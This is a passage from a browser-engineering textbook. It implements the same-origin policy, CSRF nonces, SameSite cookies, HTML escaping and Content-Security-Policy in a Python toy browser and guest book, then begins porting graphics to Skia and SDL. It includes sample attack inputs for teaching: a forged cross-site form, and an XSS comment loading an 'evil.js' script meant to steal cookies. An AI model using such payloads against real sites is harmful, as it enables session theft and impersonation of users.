The issue here is that one server’s web page content is being sent to a script running on a website delivered by another server. Since the content is derived from cookies, this leaks private data.
To prevent issues like this, browsers have a same-origin
policy, which says that requests like
XMLHttpRequest
sSome kinds of requests are not subject to the same-origin
policy (most prominently CSS and JavaScript files linked from a web
page); conversely, the same-origin policy also governs JavaScript
interactions with iframe
s, images,
localStorage
and many other browser features.
can only go to web pages on the same “origin”—scheme, hostname, and
port.You may have
noticed that this is not the same definition of “website” as cookies
use: cookies don’t care about scheme or port! This seems to be an
oversight or incongruity left over from the messy early
web. This way, one website’s private data has to stay on
that website, and cannot be leaked to an attacker on another server.
Let’s implement the same-origin policy for our browser. We’ll need to compare the URL of the request to the URL of the page we are on:
class JSContext:
    def XMLHttpRequest_send(self, method, url, body):
        # ...
        if full_url.origin() != self.tab.url.origin():
            raise Exception("Cross-origin XHR request not allowed")
        # ...
The origin
function can just strip off the path from a
URL:
class URL:
    def origin(self):
        return self.scheme + "://" + self.host + ":" + str(self.port)
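To make the comparison concrete, here’s a self-contained sketch of origin matching, using a stripped-down stand-in for our URL class (the real class has many more fields; the names here are illustrative only):

```python
# A minimal stand-in for our URL class, with just the fields
# that origin() needs. Illustration only, not browser code.
class MiniURL:
    def __init__(self, scheme, host, port):
        self.scheme = scheme
        self.host = host
        self.port = port

    def origin(self):
        return self.scheme + "://" + self.host + ":" + str(self.port)

page = MiniURL("http", "localhost", 8000)
xhr_ok = MiniURL("http", "localhost", 8000)   # same origin
xhr_bad = MiniURL("http", "localhost", 9000)  # same host, different port!

print(page.origin() == xhr_ok.origin())   # allowed
print(page.origin() == xhr_bad.origin())  # blocked: ports differ
```

Note that two URLs on the same host but different ports have different origins, which is exactly the incongruity with cookies mentioned above.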
Now an attacker can’t read the guest book web page. But can they write to it? Actually…
One interesting form of the same-origin policy involves images and
the HTML <canvas>
element. The drawImage
method allows drawing an image to a canvas, even if that image was
loaded from another origin. But to prevent that image from being read
back with getImageData
or related methods, writing cross-origin data to a canvas taints
it, blocking read methods.
The same-origin policy prevents cross-origin
XMLHttpRequest
calls. But the same-origin policy doesn’t
apply to normal browser actions like clicking a link or filling out a
form. This enables an exploit called cross-site request
forgery, often shortened to CSRF.
In cross-site request forgery, instead of using
XMLHttpRequest,
the attacker uses a form that submits to
the guest book:
<form action="http://localhost:8000/add" method=post>
<p><input name=guest></p>
<p><button>Sign the book!</button></p>
</form>
Even though this form is on the evildoer’s website, when you submit the form, the browser will make an HTTP request to the guest book. And that means it will send its guest book cookies, so it will be logged in, so the guest book code will allow a post. But the user has no way of knowing which server a form submits to—the attacker’s web page could have misrepresented that—so they may have posted something they didn’t mean to.Even worse, the form submission could be triggered by JavaScript, with the user not involved at all. And this kind of attack can be further disguised by hiding the entry widget, pre-filling the post, and styling the button to look like a normal link.
Of course, the attacker can’t read the response, so this doesn’t leak private data to the attacker. But it can allow the attacker to act as the user! Posting a comment this way is not too scary (though shady advertisers will pay for it!) but posting a bank transaction is. And if the website has a change-of-password form, there could even be a way to take control of the account.
Unfortunately, we can’t just apply the same-origin policy to form submissions.For example, many search forms on websites submit to Google, because those websites don’t have their own search engines. So how do we defend against this attack?
To start with, there are things the server can do. The usual advice
is to make sure that every POST request to /add
comes from
a form on our website. The way to do that is to embed a secret value,
called a nonce, into the form, and to reject form submissions
that don’t come with the right secret value. You can only get a nonce
from the server, and the nonce is tied to the user session,It’s important that nonces are
associated with the particular user. Otherwise, the attacker can
generate a nonce for themselves and insert it into a form meant
for the user. so the attacker could not embed it
in their form.A nonce is
somewhat like a cookie, except that it’s stored inside the HTML instead
of the browser cookie. Like a cookie, it can be stolen with cross-site
scripting.
To implement this fix, generate a nonce and save it in the user
session when a form is requested:Usually <input type=hidden>
is
invisible, though our browser doesn’t support this.
def show_comments(session):
    # ...
    if "user" in session:
        nonce = str(random.random())[2:]
        session["nonce"] = nonce
        # ...
        out += "<input name=nonce type=hidden value=" + nonce + ">"
When a form is submitted, the server checks that the right nonce is submitted with it:In real websites it’s usually best to allow one user to have multiple active nonces, so that a user can open two forms in two tabs without that overwriting the valid nonce. To prevent the nonce set from growing over time, you’d have nonces expire after a while. I’m skipping this here, because it’s not the focus of this chapter.
def add_entry(session, params):
    if "nonce" not in session or "nonce" not in params: return
    if session["nonce"] != params["nonce"]: return
    # ...
Now this form can’t be submitted except from our website. Repeat this nonce fix for each form in the application, and it’ll be secure from CSRF attacks. But server-side solutions are fragile—what if you forget a form—and relying on every website out there to do it right is a pipe dream. It’d be better for the browser to provide a fail-safe backup.
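As a minimal sketch of the whole nonce round-trip, here’s a standalone version with hypothetical helper names (not the guest book’s code; it also uses Python’s secrets module, a better randomness source for this purpose than random):

```python
import secrets

session = {}  # stands in for the per-user session store

def render_form():
    # Generate a fresh nonce when the form is rendered and
    # remember it in the user's session.
    nonce = secrets.token_hex(16)
    session["nonce"] = nonce
    return "<input name=nonce type=hidden value=" + nonce + ">"

def check_submission(params):
    # Only accept the submission if it echoes back the nonce
    # we handed out to this user.
    return "nonce" in session and params.get("nonce") == session["nonce"]

form_html = render_form()
print(check_submission({"nonce": session["nonce"]}))  # genuine form
print(check_submission({"nonce": "guessed"}))         # forged form
```

An attacker’s form can’t contain the right nonce, because the attacker never saw this user’s rendered form.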
One unusual attack, similar in spirit to cross-site request forgery,
is click-jacking.
In this attack, an external site in a transparent iframe
is
positioned over the attacker’s site. The user thinks they are clicking
around one site, but they actually take actions on a different one.
Nowadays, sites can prevent this with the frame-ancestors
directive to Content-Security-Policy
or the older X-Frame-Options
header.
For form submissions, that fail-safe solution is
SameSite
cookies. The idea is that if a server marks its
cookies SameSite
, the browser will not send them in
cross-site form submissions.At the time of this writing, the SameSite
cookie standard is still in a draft stage, and not all browsers
implement that draft fully. So it’s possible for this section to become
out of date, though some kind of SameSite
cookies will
probably be ratified. The MDN
page is helpful for checking the current status of
SameSite
cookies.
A cookie is marked SameSite
in the
Set-Cookie
header like this:
Set-Cookie: foo=bar; SameSite=Lax
The SameSite
attribute can take the value
Lax
, Strict
, or None
, and as I
write, browsers have and plan different defaults. Our browser will
implement only Lax
and None
, and default to
None
. When SameSite
is set to
Lax
, the cookie is not sent on cross-site POST
requests, but is sent on same-site POST
or cross-site
GET
requests.Cross-site GET
requests are also known as
“clicking a link”, which is why those are allowed in Lax
mode. The Strict
version of SameSite
blocks
these too, but you need to design your web application carefully for
this to work.
First, let’s modify COOKIE_JAR
to store cookie/parameter
pairs, and then parse those parameters out of Set-Cookie
headers:
def request(self, payload=None):
    # ...
    if "set-cookie" in headers:
        params = {}
        if ";" in headers["set-cookie"]:
            cookie, rest = headers["set-cookie"].split(";", 1)
            for param_pair in rest.split(";"):
                name, value = param_pair.strip().split("=", 1)
                params[name.lower()] = value.lower()
        else:
            cookie = headers["set-cookie"]
        COOKIE_JAR[self.host] = (cookie, params)
When sending a cookie in an HTTP request, the browser only sends the cookie value, not the parameters:
def request(self, payload=None):
    # ...
    if self.host in COOKIE_JAR:
        cookie, params = COOKIE_JAR[self.host]
        body += "Cookie: {}\r\n".format(cookie)
This stores the SameSite
parameter of a cookie. But to
actually use it, we need to know which site an HTTP request is being
made from. Let’s add a new top_level_url
parameter to
request
to track that:
class URL:
    def request(self, top_level_url, payload=None):
        # ...
Our browser calls request
in three places, and we need
to send the top-level URL in each case. At the top of load
,
it makes the initial request to a page. Modify it like so:
class Tab:
    def load(self, url, body=None):
        headers, body = url.request(self.url, body)
        # ...
Here, url
is the new URL to visit, but
self.url
is the URL of the page where the request comes
from. Make sure this line comes at the top of load
, before
self.url
is changed!
Later, the browser loads styles and scripts with more
request
calls:
class Tab:
    def load(self, url, body=None):
        # ...
        for script in scripts:
            # ...
            header, body = script_url.request(url)
            # ...
        # ...
        for link in links:
            # ...
            header, body = style_url.request(url)
            # ...
        # ...
For these requests the top-level URL is the new URL being loaded. That’s because it is the new page that made us request these particular styles and scripts, so it defines which of those resources are on the same site.
Similarly, XMLHttpRequest
-triggered requests use the tab
URL as their top-level URL:
class JSContext:
    def XMLHttpRequest_send(self, method, url, body):
        # ...
        headers, out = full_url.request(self.tab.url, body)
        # ...
The request
function can now check the
top_level_url
argument before sending SameSite
cookies. Remember that SameSite
cookies are only sent for
GET
requests or if the new URL and the top-level URL have
the same host name:As I
write this, some browsers also check that the new URL and the top-level
URL have the same scheme and some browsers ignore subdomains, so that
www.foo.com
and login.foo.com
are considered
the “same site”. If cookies were invented today, they’d probably be
specific to URL origins, much like CSP policies, but alas historical
contingencies and backwards compatibility force rules that are more
complex but easier to deploy.
def request(self, top_level_url, payload=None):
    # ...
    if self.host in COOKIE_JAR:
        cookie, params = COOKIE_JAR[self.host]
        allow_cookie = True
        if top_level_url and params.get("samesite", "none") == "lax":
            if method != "GET":
                allow_cookie = self.host == top_level_url.host
        if allow_cookie:
            body += "Cookie: {}\r\n".format(cookie)
    # ...
Note that we check whether the top_level_url
is set—it
won’t be when we’re loading the first web page in a new tab.
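The decision logic can be summarized in a little standalone function (a hypothetical helper for illustration, not part of the browser):

```python
def cookie_allowed(method, params, host, top_level_host):
    # Mirror of the SameSite=Lax rule: withhold cookies only on
    # cross-site non-GET requests.
    if top_level_host is None:
        return True  # first page load in a new tab
    if params.get("samesite", "none") != "lax":
        return True  # our browser only implements Lax and None
    if method == "GET":
        return True  # Lax still sends cookies on GETs (link clicks)
    return host == top_level_host  # POSTs must be same-site

lax = {"samesite": "lax"}
print(cookie_allowed("POST", lax, "localhost", "evil.example"))  # False
print(cookie_allowed("GET", lax, "localhost", "evil.example"))   # True
print(cookie_allowed("POST", lax, "localhost", "localhost"))     # True
```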
Our guest book can now mark its cookies SameSite
:
def handle_connection(conx):
    # ...
    if 'cookie' not in headers:
        template = "Set-Cookie: token={}; SameSite=Lax\r\n"
        response += template.format(token)
But don’t remove the nonces we added earlier: SameSite
provides a kind of “defense in depth”, a fail-safe that makes sure that
even if we forgot a nonce somewhere, we’re still secure against CSRF
attacks.
The web was not initially designed around security, which has led to some awkward patches after the fact. These patches may be ugly, but a dedication to backwards compatibility is a strength of the web, and at least newer APIs can be designed around more consistent policies.
Now other websites can’t misuse our browser’s cookies to read or
write private data. This seems secure! But what about our own
website? With cookies accessible from JavaScript, any scripts run on our
server could, in principle, read the cookie value. This might seem
benign—doesn’t our server only run comment.js
? But in
fact…
A web service needs to defend itself from being misused. Consider the code in our guest book that outputs guest book entries:
out += "<p>" + entry + "\n"
out += "<i>by " + who + "</i></p>"
Note that entry
can be anything, including anything the
user might stick into our comment form. That includes HTML tags, like a
custom <script>
tag! So, a malicious user could post
this comment:
Hi! <script src="http://my-server/evil.js"></script>
The server would then output this HTML:
<p>Hi! <script src="http://my-server/evil.js"></script>
<i>by crashoverride</i></p>
Every user’s browser would then download and run the
evil.js
script, which can send the cookies to
the attacker.A site’s cookies and cookie
parameters are available to scripts running on that site through the document.cookie
API.See
the exercise on Access-Control-Allow-Origin
for more
details on how web servers can opt in to allowing cross-origin
requests. To steal cookies, it’s the attacker’s server that would need
to opt in to receiving them. Or, in a real browser,
evil.js
could add images or scripts to the page to trigger
additional requests.In our limited browser the attack has to be a little
clunkier, but the evil script still can, for example, replace the whole
page with a link that goes to the attacker’s site and includes the token
value in the URL. You’ve seen “please click to continue” screens and
have clicked through unthinkingly; your users will too.
The attacker could then impersonate other users, posting
as them or misusing any other capabilities those users had.
The core problem here is that user comments are supposed to be data, but the browser is interpreting them as code. In web applications, this kind of exploit is usually called cross-site scripting (often written “XSS”), though misinterpreting data as code is a common security issue in all kinds of programs.
The standard fix is to encode the data so that it can’t be
interpreted as code. For example, in HTML, you can write
&lt;
to display a less-than sign.You may have implemented this
in a Chapter 1 exercise.
Python has an html
module for this kind of encoding:
import html

def show_comments(session):
    # ...
    out += "<p>" + html.escape(entry) + "\n"
    out += "<i>by " + html.escape(who) + "</i></p>"
    # ...
This is a good fix, and every application should be careful to do this escaping. But if you forget to encode any text anywhere—that’s a security bug. So browsers provide additional layers of defense.
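To see the encoding in action, here’s what Python’s html.escape does to the malicious comment from earlier:

```python
import html

# The attacker's comment from above, containing a script tag.
comment = 'Hi! <script src="http://my-server/evil.js"></script>'

# html.escape replaces <, >, &, and (by default) quotes with
# HTML entities, so the browser treats the result as text.
print(html.escape(comment))
# Hi! &lt;script src=&quot;http://my-server/evil.js&quot;&gt;&lt;/script&gt;
```

The browser now parses the comment as text: &lt; renders as a literal less-than sign instead of opening a tag.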
Since the CSS parser is very permissive,
some HTML pages also parse as valid CSS. This leads to an attack:
include an external HTML page as a style sheet and observe the styling
it applies. A similar
attack involves including external JSON files as scripts. Setting a
Content-Type
header can prevent this sort of attack thanks
to browsers’ Cross-Origin
Read Blocking policy.
One such layer is the Content-Security-Policy
header.
The full specification for this header is quite complex, but in the
simplest case, the header is set to the keyword default-src
followed by a space-separated list of servers:
Content-Security-Policy: default-src http://example.org
This header asks the browser not to load any resources (including
CSS, JavaScript, images, and so on) except from the listed origins. If
our guest book used Content-Security-Policy
, even if an
attacker managed to get a <script>
added to the page,
the browser would refuse to load and run that script.
Let’s implement support for this header. First, we’ll need to extract
and parse the Content-Security-Policy
header:In real browsers
Content-Security-Policy
can also list scheme-generic URLs
and other sources like 'self'
. And there are keywords other
than default-src
, to restrict styles, scripts, and
XMLHttpRequest
s each to their own set of
URLs.
class Tab:
    def load(self, url, body=None):
        # ...
        self.allowed_origins = None
        if "content-security-policy" in headers:
            csp = headers["content-security-policy"].split()
            if len(csp) > 0 and csp[0] == "default-src":
                self.allowed_origins = []
                for origin in csp[1:]:
                    self.allowed_origins.append(URL(origin).origin())
        # ...
This parsing needs to happen before we request any JavaScript or CSS, because we now need to check whether those requests are allowed:
class Tab:
    def load(self, url, body=None):
        # ...
        for script in scripts:
            script_url = url.resolve(script)
            if not self.allowed_request(script_url):
                print("Blocked script", script, "due to CSP")
                continue
            # ...
Note that we need to first resolve relative URLs to know if they’re allowed. Add a similar test to the CSS-loading code.
XMLHttpRequest
URLs also need to be checked:Note that when loading styles
and scripts, our browser merely ignores blocked resources, while for
blocked XMLHttpRequest
s it throws an exception. That’s
because exceptions in XMLHttpRequest
calls can be caught
and handled in JavaScript.
class JSContext:
    def XMLHttpRequest_send(self, method, url, body):
        full_url = self.tab.url.resolve(url)
        if not self.tab.allowed_request(full_url):
            raise Exception("Cross-origin XHR blocked by CSP")
        # ...
The allowed_request
check needs to handle both the case
of no Content-Security-Policy
and the case where there is
one:
class Tab:
    def allowed_request(self, url):
        return self.allowed_origins == None or \
            url.origin() in self.allowed_origins
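Putting the parsing and the check together, here’s a standalone sketch (it skips the URL(origin).origin() normalization the browser does, so listed origins must already be in scheme://host:port-like form):

```python
def parse_csp(header_value):
    # Return the list of allowed origins, or None if the policy
    # doesn't start with default-src (meaning no restriction).
    parts = header_value.split()
    if parts and parts[0] == "default-src":
        return parts[1:]
    return None

def allowed_request(allowed_origins, origin):
    # No policy means everything is allowed.
    return allowed_origins is None or origin in allowed_origins

policy = parse_csp("default-src http://example.org")
print(allowed_request(policy, "http://example.org"))   # True
print(allowed_request(policy, "http://evil.example"))  # False
print(allowed_request(None, "http://evil.example"))    # True: no CSP
```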
The guest book can now send a Content-Security-Policy
header:
def handle_connection(conx):
    # ...
    csp = "default-src http://localhost:8000"
    response += "Content-Security-Policy: {}\r\n".format(csp)
    # ...
To check that our implementation works, let’s have the guest book request a script from outside the list of allowed servers:
def show_comments(session):
    # ...
    out += "<script src=https://example.com/evil.js></script>"
    # ...
If you’ve got everything implemented correctly, the browser should
block the evil scriptNeedless to say, example.com
does not actually
host an evil.js
file, and any request to it returns
404 Not Found
. and report so in the
console.
So are we done? Is the guest book totally secure? Uh… no. There’s more—much, much more—to web application security than what’s in this book. And just like the rest of this book, there are many other browser mechanisms that touch on security and privacy. Let’s settle for this fact: the guest book is more secure than before.
On a complicated site, deploying Content-Security-Policy
can accidentally break something. For this reason, browsers can
automatically report Content-Security-Policy
violations to
the server, using the report-to
directive. The Content-Security-Policy-Report-Only
header asks the browser to report violations of the content security
policy without actually blocking the requests.
We’ve added user data, in the form of cookies, to our browser, and immediately had to bear the heavy burden of securing that data and ensuring it was not misused. That involved:
restricting cross-origin XMLHttpRequests with the same-origin policy;
blocking cross-site form submissions with SameSite cookies; and
limiting where scripts and styles can load from with Content-Security-Policy.
We’ve also seen the more general lesson that every increase in the capabilities of a web browser also leads to an increase in its responsibility to safeguard user data. Security is an ever-present consideration throughout the design of a web browser.
The purpose of this book is to teach the internals of web browsers, not to teach web application security. There’s much more you’d want to do to make this guest book truly secure, let alone what we’d need to do to avoid denial of service attacks or to handle spam and malicious use. Please consult other sources before working on security-critical code.
The complete set of functions, classes, and methods in our browser should now look something like this:
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
FONTS
def get_font(size, weight, slant)
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
BLOCK_ELEMENTS
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(scroll, canvas)
def __repr__()
class CSSParser:
def __init__(s)
def whitespace()
def literal(literal)
def word()
def pair()
def ignore_until(chars)
def body()
def selector()
def parse()
class TagSelector:
def __init__(tag)
def matches(node)
def __repr__()
class DescendantSelector:
def __init__(ancestor, descendant)
def matches(node)
def __repr__()
INHERITED_PROPERTIES
def style(node, rules)
def cascade_priority(rule)
class DrawText:
def __init__(x1, y1, text, font, color)
def execute(scroll, canvas)
def __repr__()
def tree_to_list(tree, list)
class DrawLine:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class DrawOutline:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class LineLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
class TextLayout:
def __init__(node, word, parent, previous)
def layout()
def paint(display_list)
CHROME_PX
class URL:
def __init__(url)
def request(top_level_url, payload)
def resolve(url)
def origin()
class Browser:
def __init__()
def handle_down(e)
def handle_click(e)
def handle_key(e)
def handle_enter(e)
def load(url)
def paint_chrome()
def draw()
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(node, word)
def flush()
def recurse(node)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
def get_font(node)
def __repr__()
def new_line()
def input(node)
class InputLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
INPUT_WIDTH_PX
EVENT_DISPATCH_CODE
class JSContext:
def __init__(tab)
def run(code)
def dispatch_event(type, elt)
def get_handle(elt)
def querySelectorAll(selector_text)
def getAttribute(handle, attr)
def innerHTML_set(handle, s)
def XMLHttpRequest_send(method, url, body)
class Tab:
def __init__()
def load(url, body)
def draw(canvas)
def scrolldown()
def click(x, y)
def go_back()
def __repr__()
def render()
def submit_form(elt)
def keypress(char)
def allowed_request(url)
COOKIE_JAR
if __name__ == "__main__"
The server has also grown since last chapter:
SESSIONS
def handle_connection(conx)
ENTRIES
LOGINS
def do_request(session, method, url, headers, body)
def form_decode(body)
def show_comments(session)
def login_form(session)
def do_login(session, params)
def not_found(url, method)
def add_entry(session, params)
if __name__ == "__main__"
If you run it, it should look something like this page; due to the browser sandbox, you will need to open that page in a new tab.
New inputs: Add support for hidden and password input elements. Hidden inputs shouldn’t show up or take up space, while password input elements should show their contents as stars instead of characters.
Certificate errors: When accessing an HTTPS page, the web
server can send an invalid certificate (badssl.com hosts various invalid
certificates you can use for testing). In this case, the
wrap_socket
function will raise a certificate error; catch
these errors and show a warning message to the user. For all
other HTTPS pages draw a padlock (spelled
\N{lock}
) in the address bar.
Script access: Implement the document.cookie
JavaScript API. Reading this field should return a string containing
the cookie value and parameters, formatted similarly to the
Cookie
header. Writing to this field updates the cookie
value and parameters, just like receiving a Set-Cookie
header does. Also implement the HttpOnly
cookie parameter;
cookies with this parameter cannot
be read or written from JavaScript.
Cookie Expiration: Add support for cookie expiration. Cookie
expiration dates are set in the Set-Cookie
header, and can
be overwritten if the same cookie is set again with a later date. On the
server side, save the same expiration dates in the SESSIONS
variable and use it to delete old sessions to save memory.
CORS: Web servers can opt
in to allowing cross-origin XMLHttpRequest
s. The
way it works is that on cross-origin HTTP requests, the browser makes
the request and includes an Origin
header with the origin
of the requesting site; this request includes cookies for the target
origin. Per the same-origin policy, the browser then throws away the
response. But the server can send the
Access-Control-Allow-Origin
header, and if its value is
either the requesting origin or the special *
value, the
browser returns the response to the script. All requests made by your
browser will be what the CORS standard calls “simple requests”.
Referer: When your browser visits a web page, or when it
loads a CSS or JavaScript file, it sends a Referer
headerYep, spelled that
way. containing the URL it is coming from. Sites often
use this for analytics. Implement this in your browser. However, some
URLs contain personal data that they don’t want revealed to other
websites, so browsers support a Referrer-Policy
header,Yep, spelled that
way. which can contain values like
no-referrer
(never send the Referer
header when
leaving this page) or same-origin
(only do so if navigating
to another page on the same origin). Implement those two values for
Referrer-Policy
.
Right now our browser can only draw colored rectangles and text—pretty boring! Real browsers support all kinds of visual effects that change how pixels and colors blend together. Let’s implement these effects using the Skia graphics library, and also see a bit of how Skia is implemented under the hood. That’ll also allow us to use surfaces for browser compositing to accelerate scrolling.
Before we get any further, we’ll need to upgrade our graphics system. While Tkinter is great for basic shapes and handling input, it lacks built-in support for many visual effects.That’s because Tk, the graphics library that Tkinter uses, dates from the early 90s, before high-performance graphics cards and GPUs became widespread. Implementing all details of the web’s many visual effects is fun, but it’s outside the scope of this book, so we need a new graphics library. Let’s use Skia, the library that Chromium uses. Unlike Tkinter, Skia doesn’t handle inputs or create graphical windows, so we’ll pair it with the SDL GUI library.
Start by installing Skia and SDL:
pip3 install skia-python pysdl2 pysdl2-dll
As elsewhere in this book, you may need to use pip
,
easy_install
, or python3 -m pip
instead of
pip3
as your installer, or use your IDE’s package
installer. If you’re on Linux, you’ll need to install additional
dependencies, like OpenGL and fontconfig. Also, you may not be able to
install pysdl2-dll
; if so, you’ll need to find SDL in your
system package manager instead. Consult the skia-python
and pysdl2
web pages for more details.
Once installed, remove the tkinter
imports from browser
and replace them with these:
import ctypes
import sdl2
import skia
If any of these imports fail, you probably need to check that Skia
and SDL were installed correctly. Note that the ctypes
module comes standard in Python; it is used to convert between Python
and C types.
The <canvas>
HTML element provides a JavaScript API that is similar to Skia and
Tkinter. Combined with WebGL,
it’s possible to implement basically all of SDL and Skia in JavaScript.
Alternatively, one can compile Skia to
WebAssembly
to do the same.
The main loop of the browser first needs some boilerplate to get SDL started:
if __name__ == "__main__":
    import sys
    sdl2.SDL_Init(sdl2.SDL_INIT_EVENTS)
    browser = Browser()
    browser.load(URL(sys.argv[1]))
    # ...
Next, we need to create an SDL window, instead of a Tkinter window, inside the Browser, and set up Skia to draw to it. Here’s the SDL incantation to create a window:
class Browser:
    def __init__(self):
        self.sdl_window = sdl2.SDL_CreateWindow(b"Browser",
            sdl2.SDL_WINDOWPOS_CENTERED,
            sdl2.SDL_WINDOWPOS_CENTERED,
            WIDTH, HEIGHT, sdl2.SDL_WINDOW_SHOWN)
To set up Skia to draw to this window, we also need to create a surface for it:In Skia and SDL, a surface is a representation of a graphics buffer into which you can draw pixels (bits representing colors). A surface may or may not be bound to the physical pixels on the screen via a window, and there can be many surfaces. A canvas is an API interface that allows you to draw into a surface with higher-level commands such as for rectangles or text. Our browser uses separate Skia and SDL surfaces for simplicity, but in a highly optimized browser, minimizing the number of surfaces is important for good performance.
class Browser:
    def __init__(self):
        self.root_surface = skia.Surface.MakeRaster(
            skia.ImageInfo.Make(
                WIDTH, HEIGHT,
                ct=skia.kRGBA_8888_ColorType,
                at=skia.kUnpremul_AlphaType))
Typically, we’ll draw to the Skia surface, and then once we’re done with it we’ll copy it to the SDL surface to display on the screen. This will be a little hairy, because we are moving data between two low-level libraries, but really it’s just copying pixels from one place to another.
First, get the sequence of bytes representing the Skia surface:
class Browser:
    def draw(self):
        # ...

        # This makes an image interface to the Skia surface, but
        # doesn't actually copy anything yet.
        skia_image = self.root_surface.makeImageSnapshot()
        skia_bytes = skia_image.tobytes()
Next, we need to copy the data to an SDL surface. This requires
telling SDL what order the pixels are stored in (which we specified to
be RGBA_8888
when constructing the surface) and on your
computer’s endianness:
class Browser:
    def __init__(self):
        if sdl2.SDL_BYTEORDER == sdl2.SDL_BIG_ENDIAN:
            self.RED_MASK = 0xff000000
            self.GREEN_MASK = 0x00ff0000
            self.BLUE_MASK = 0x0000ff00
            self.ALPHA_MASK = 0x000000ff
        else:
            self.RED_MASK = 0x000000ff
            self.GREEN_MASK = 0x0000ff00
            self.BLUE_MASK = 0x00ff0000
            self.ALPHA_MASK = 0xff000000
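To see why the masks flip with endianness, here is a standalone sketch (not browser code) that reads the same four RGBA bytes as a 32-bit integer in both byte orders using the standard struct module:

```python
import struct

rgba = bytes([0x11, 0x22, 0x33, 0x44])  # R, G, B, A in memory order

big = struct.unpack(">I", rgba)[0]     # big-endian read: 0x11223344
little = struct.unpack("<I", rgba)[0]  # little-endian read: 0x44332211

# Red lands in the high byte on big-endian machines,
# but in the low byte on little-endian machines:
assert big & 0xff000000 == 0x11000000
assert little & 0x000000ff == 0x11
```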
The CreateRGBSurfaceFrom
method then wraps the data in an SDL surface, without copying the
bytes. Note that since Skia and SDL are C++ libraries, they are not
integrated with Python's garbage collection system. So the link
between the output of tobytes
and the SDL surface is not tracked: if skia_bytes
is garbage collected, the SDL surface will be left pointing at a
bogus piece of memory, which will lead to memory corruption or a
crash. The code here is correct, because all of these are local
variables that are garbage-collected together, but if they weren't,
you would need to be careful to keep all of them alive at the same
time.
class Browser:
    def draw(self):
        # ...
        depth = 32 # Bits per pixel
        pitch = 4 * WIDTH # Bytes per row
        sdl_surface = sdl2.SDL_CreateRGBSurfaceFrom(
            skia_bytes, WIDTH, HEIGHT, depth, pitch,
            self.RED_MASK, self.GREEN_MASK,
            self.BLUE_MASK, self.ALPHA_MASK)
Finally, we draw all this pixel data on the window itself by blitting
(copying) it from sdl_surface
to sdl_window
’s
surface:
class Browser:
    def draw(self):
        # ...
        rect = sdl2.SDL_Rect(0, 0, WIDTH, HEIGHT)
        window_surface = sdl2.SDL_GetWindowSurface(self.sdl_window)
        # SDL_BlitSurface is what actually does the copy.
        sdl2.SDL_BlitSurface(sdl_surface, rect, window_surface, rect)
        sdl2.SDL_UpdateWindowSurface(self.sdl_window)
Next, SDL doesn’t have a mainloop
or bind
method; we have to implement it ourselves:
if __name__ == "__main__":
    # ...
    event = sdl2.SDL_Event()
    while True:
        while sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
            if event.type == sdl2.SDL_QUIT:
                browser.handle_quit()
                sdl2.SDL_Quit()
                sys.exit()
        # ...
The details of ctypes
and PollEvent
aren’t
too important here, but note that SDL_QUIT
is an event,
sent when the user closes the last open window. The
handle_quit
method it calls just cleans up the window
object:
class Browser:
    def handle_quit(self):
        sdl2.SDL_DestroyWindow(self.sdl_window)
We’ll also need to handle all of the other events in this loop—clicks, typing, and so on. The SDL syntax looks like this:
if __name__ == "__main__":
    while True:
        while sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
            # ...
            elif event.type == sdl2.SDL_MOUSEBUTTONUP:
                browser.handle_click(event.button)
            elif event.type == sdl2.SDL_KEYDOWN:
                if event.key.keysym.sym == sdl2.SDLK_RETURN:
                    browser.handle_enter()
                elif event.key.keysym.sym == sdl2.SDLK_DOWN:
                    browser.handle_down()
            elif event.type == sdl2.SDL_TEXTINPUT:
                browser.handle_key(event.text.text.decode('utf8'))
I’ve changed the signatures of the various event handler methods;
you’ll need to make analogous changes in Browser
where they
are defined. This loop replaces all of the bind
calls in
the Browser
constructor, which you can now remove.
SDL is most popular for making games. Its site lists a selection of books about game programming in SDL.
Now our browser is creating an SDL window and can draw to it via Skia. But most of the browser codebase is still using Tkinter drawing commands, which we now need to replace. Skia is a bit more verbose than Tkinter, so let’s abstract over some details with helper functions.Consult the Skia and skia-python documentation for more on the Skia API. First, a helper function to convert colors to Skia colors:
def parse_color(color):
    if color == "white":
        return skia.ColorWHITE
    elif color == "lightblue":
        return skia.ColorSetARGB(0xFF, 0xAD, 0xD8, 0xE6)
    # ...
    else:
        return skia.ColorBLACK
You can add more “elif” blocks to support any other color names you use; modern browsers support quite a lot.
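For example, the demos later in this chapter also use "orange" and "blue". Here is a sketch of a table-driven variant (illustration only, not the book's code), with the standard CSS values for those names as (alpha, red, green, blue) byte tuples; in the browser, each entry would be handed to skia.ColorSetARGB:

```python
# Standard CSS named-color values, as (A, R, G, B) bytes:
NAMED_COLORS = {
    "white":     (0xFF, 0xFF, 0xFF, 0xFF),
    "lightblue": (0xFF, 0xAD, 0xD8, 0xE6),
    "orange":    (0xFF, 0xFF, 0xA5, 0x00),
    "blue":      (0xFF, 0x00, 0x00, 0xFF),
    "black":     (0xFF, 0x00, 0x00, 0x00),
}

def parse_color(color):
    # Fall back to black for unknown names, like the version above:
    return NAMED_COLORS.get(color, NAMED_COLORS["black"])

print(parse_color("orange"))  # (255, 255, 165, 0)
```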
To draw a line, you use Skia’s Path
object:
class DrawLine:
    def execute(self, scroll, canvas):
        path = skia.Path().moveTo(self.x1, self.y1 - scroll) \
                          .lineTo(self.x2, self.y2 - scroll)
        paint = skia.Paint(Color=parse_color(self.color))
        paint.setStyle(skia.Paint.kStroke_Style)
        paint.setStrokeWidth(self.thickness)
        canvas.drawPath(path, paint)
To draw text, you use drawString
:
class DrawText:
    def execute(self, scroll, canvas):
        paint = skia.Paint(
            AntiAlias=True, Color=parse_color(self.color))
        baseline = self.top - scroll \
